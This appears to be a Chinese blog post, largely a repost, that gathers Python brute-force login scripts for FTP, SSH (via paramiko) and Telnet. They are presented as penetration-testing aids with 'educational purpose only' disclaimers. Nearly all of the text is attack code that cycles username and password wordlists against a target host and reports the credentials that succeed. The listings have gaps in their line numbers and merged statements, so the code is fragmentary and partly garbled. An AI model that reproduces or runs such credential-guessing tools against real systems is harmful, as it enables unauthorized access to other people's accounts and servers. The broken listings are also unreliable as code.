在渗透测试当中,免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本,并非原创作品,但有借鉴意义。
FTP暴力破解脚本
001
|
#!/usr/bin/env python
|
002
|
#-*-coding = utf-8-*-
|
004
|
#blog:@blog.sina.com.cn/kaiyongdeng
|
008
|
from ftplib import FTP
|
010
|
[*] This was written for educational purpose and pentest only. Use it at your own risk.
|
011
|
[*] Author will be not responsible for any damage!
|
012
|
[*] Toolname : ftp_bf.py
|
015
|
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
|
018
|
if sys.platform == ‘linux’ or sys.platform == ‘linux2’:
|
028
|
print G+”\n |—————————————————————|”
|
030
|
print ” | blog.sina.com.cn/kaiyongdeng |”
|
031
|
print ” | 08/05/2012 ftp_bf.py v.0.1 |”
|
032
|
print ” | FTP Brute Forcing Tool |”
|
034
|
print ” |—————————————————————|\n”
|
035
|
print ” \n [-] %s\n” % time.strftime(“%X”)
|
039
|
print R+”[*]-t, –target ip/hostname <> Our target”
|
040
|
print “[*]-u, –usernamelist usernamelist <> usernamelist path”
|
041
|
print “[*]-p, –passwordlist passwordlist <> passwordlist path”
|
042
|
print “[*]-h, –help help <> print this help”
|
043
|
print “[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt”+END sys.exit(1)
|
045
|
def bf_login(hostname,username,password):
|
046
|
# sys.stdout.write(“\r[!]Checking : %s ” % (p))
|
050
|
ftp.login(hostname,username, password)
|
051
|
ftp.retrlines(‘list’)
|
053
|
print Y+”\n[!] w00t,w00t!!! We did it ! ”
|
054
|
print “[+] Target : “,hostname, “”
|
055
|
print “[+] User : “,username, “”
|
056
|
print “[+] Password : “,password, “”+END
|
060
|
pass except KeyboardInterrupt: print R+”\n[-] Exiting …\n”+END
|
063
|
def anon_login(hostname):
|
065
|
print G+”\n[!] Checking for anonymous login.\n”+END
|
066
|
ftp = FTP(hostname) ftp.login()
|
067
|
ftp.retrlines(‘LIST’)
|
068
|
print Y+”\n[!] w00t,w00t!!! Anonymous login successfuly !\n”+END
|
071
|
print R+”\n[-] Anonymous login failed…\n”+END
|
078
|
if arg.lower() == ‘-t’ or arg.lower() == ‘–target’:
|
079
|
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
|
080
|
elif arg.lower() == ‘-u’ or arg.lower() == ‘–usernamelist’:
|
081
|
usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
|
082
|
elif arg.lower() == ‘-p’ or arg.lower() == ‘–passwordlist’:
|
083
|
passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
|
084
|
elif arg.lower() == ‘-h’ or arg.lower() == ‘–help’:
|
086
|
elif len(sys.argv) <= 1:
|
089
|
print R+”[-]Cheak your parametars input\n”+END
|
092
|
print G+”[!] BruteForcing target …”+END
|
097
|
usernames = open(usernamelist, “r”)
|
098
|
user = usernames.readlines()
|
100
|
while count1 < len(user):
|
101
|
user[count1] = user[count1].strip()
|
104
|
print R+”\n[-] Cheak your usernamelist path\n”+END
|
107
|
# print “here is ok “,usernamelist,passwordlist
|
109
|
passwords = open(passwordlist, “r”)
|
110
|
pwd = passwords.readlines()
|
112
|
while count2 < len(pwd):
|
113
|
pwd[count2] = pwd[count2].strip()
|
116
|
print R+”\n[-] Check your passwordlist path\n”+END
|
119
|
print G+”\n[+] Loaded:”,len(user),”usernames”
|
120
|
print “\n[+] Loaded:”,len(pwd),”passwords”
|
121
|
print “[+] Target:”,hostname
|
122
|
print “[+] Guessing…\n”+END
|
123
|
for u in user: for p in pwd:
|
124
|
result = bf_login(hostname,u.replace(“\n”,””),p.replace(“\n”,””))
|
126
|
print G+”[+]Attempt uaername:%s password:%s…” % (u,p) + R+”Disenable”+END
|
128
|
print G+”[+]Attempt uaername:%s password:%s…” % (u,p) + Y+”Enable”+END
|
130
|
print R+”\n[-]There is no username ans password enabled in the list.”
|
131
|
print “[-]Exiting…\n”+END
|
133
|
if __name__ == “__main__”:
|
SSH暴力破解
001
|
#!/usr/bin/env python
|
002
|
#-*-coding = UTF-8-*-
|
004
|
#blog@:blog.sina.com.cn/kaiyongdeng
|
010
|
#from threading import Thread
|
013
|
from paramiko import SSHClient
|
014
|
from paramiko import AutoAddPolicy
|
017
|
You need paramiko module.
|
021
|
Debian/Ubuntu: sudo apt-get install aptitude
|
022
|
: sudo aptitude install python-paramiko\n”’+END
|
026
|
[*] This was written for educational purpose and pentest only. Use it at your own risk.
|
027
|
[*] Author will be not responsible for any damage!
|
028
|
[*] Toolname : ssh_bf.py
|
031
|
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
|
035
|
if sys.platform == ‘linux’ or sys.platform == ‘linux2’:
|
049
|
print G+”\n |—————————————————————|”
|
051
|
print ” | blog.sina.com.cn/kaiyongdeng |”
|
052
|
print ” | 16/05/2012 ssh_bf.py v.0.2 |”
|
053
|
print ” | SSH Brute Forcing Tool |”
|
055
|
print ” |—————————————————————|\n”
|
056
|
print ” \n [-] %s\n” % time.ctime()
|
061
|
print Y+” [*]-H –hostname/ip <>the target hostname or ip address”
|
062
|
print ” [*]-P –port <>the ssh service port(default is 22)”
|
063
|
print ” [*]-U –usernamelist <>usernames list file”
|
064
|
print ” [*]-P –passwordlist <>passwords list file”
|
065
|
print ” [*]-H –help <>show help information”
|
066
|
print ” [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]”+END
|
069
|
def BruteForce(hostname,port,username,password):
|
071
|
Create SSH connection to target
|
074
|
ssh.set_missing_host_key_policy(AutoAddPolicy())
|
076
|
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
|
087
|
Make usernames and passwords lists
|
094
|
print R+’unable to read file \’%s\” % file+END
|
098
|
print R+’unknown error’+END
|
101
|
for line in fd.readlines():
|
102
|
item = line.replace(‘\n’, ”).replace(‘\r’, ”)
|
112
|
if arg.lower() == ‘-t’ or arg.lower() == ‘–target’:
|
113
|
hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
|
114
|
if arg.lower() == ‘-p’ or arg.lower() == ‘–port’:
|
115
|
port = sys.argv[int(sys.argv[1:].index(arg))+2]
|
116
|
elif arg.lower() == ‘-u’ or arg.lower() == ‘–userlist’:
|
117
|
userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
|
118
|
elif arg.lower() == ‘-w’ or arg.lower() == ‘–wordlist’:
|
119
|
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
|
120
|
elif arg.lower() == ‘-h’ or arg.lower() == ‘–help’:
|
122
|
elif len(sys.argv) <= 1:
|
125
|
print R+”[-]Cheak your parametars input\n”+END
|
127
|
print G+”\n[!] BruteForcing target …\n”+END
|
129
|
# print hostname,port,wordlist,userlist
|
130
|
usernamelist = makelist(userlist)
|
131
|
passwordlist = makelist(wordlist)
|
133
|
print Y+”[*] SSH Brute Force Praparing.”
|
134
|
print “[*] %s user(s) loaded.” % str(len(usernamelist))
|
135
|
print “[*] %s password(s) loaded.” % str(len(passwordlist))
|
136
|
print “[*] Brute Force Is Starting…….”+END
|
138
|
for username in usernamelist:
|
139
|
for password in passwordlist:
|
140
|
print G+”\n[+]Attempt uaername:%s password:%s…” % (username,password)+END
|
141
|
current = BruteForce(hostname, port, username, password)
|
142
|
if current == ‘error’:
|
143
|
print R+”[-]O*O The username:%s and password:%s Is Disenbabled…\n” % (username,password)+END
|
146
|
print G+”\n[+] ^-^ HaHa,We Got It!!!”
|
147
|
print “[+] username: %s” % username
|
148
|
print “[+] password: %s\n” % password+END
|
151
|
print R+”\n[-] There Is Something Wrong,Pleace Cheak It.”
|
152
|
print “[-] Exitting…..\n”+END
|
154
|
print Y+”[+] Done.^-^\n”+END
|
158
|
if __name__ == “__main__”:
|
TELNET密码暴力破解
04
|
#d3hydr8[at]gmail[dot]com
|
06
|
import threading, time, random, sys, telnetlib
|
10
|
print “Usage: ./telnetbrute.py <server> <userlist> <wordlist>”
|
14
|
users = open(sys.argv[2], “r”).readlines()
|
16
|
print “Error: Check your userlist path\n”
|
20
|
words = open(sys.argv[3], “r”).readlines()
|
22
|
print “Error: Check your wordlist path\n”
|
25
|
print “\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0”
|
26
|
print “\t————————————————–\n”
|
27
|
print “[+] Server:”,sys.argv[1]
|
28
|
print “[+] Users Loaded:”,len(users)
|
29
|
print “[+] Words Loaded:”,len(words),”\n”
|
31
|
wordlist = copy(words)
|
38
|
lock = threading.Lock()
|
41
|
value = random.sample(words, 1)
|
42
|
words.remove(value[0])
|
45
|
print “\nReloading Wordlist – Changing User\n”
|
47
|
value = random.sample(words, 1)
|
48
|
users.remove(users[0])
|
52
|
return value[0][:-1], users[0]
|
54
|
return value[0][:-1], users[0][:-1]
|
56
|
class Worker(threading.Thread):
|
59
|
value, user = getword()
|
62
|
print “User:”,user,”Password:”,value
|
63
|
tn = telnetlib.Telnet(sys.argv[1])
|
64
|
tn.read_until(“login: “)
|
67
|
tn.read_until(“Password: “)
|
68
|
tn.write(value + “\n”)
|
72
|
print “\t\nLogin successful:”,value, user
|
79
|
for I in range(len(words)*len(users)):
|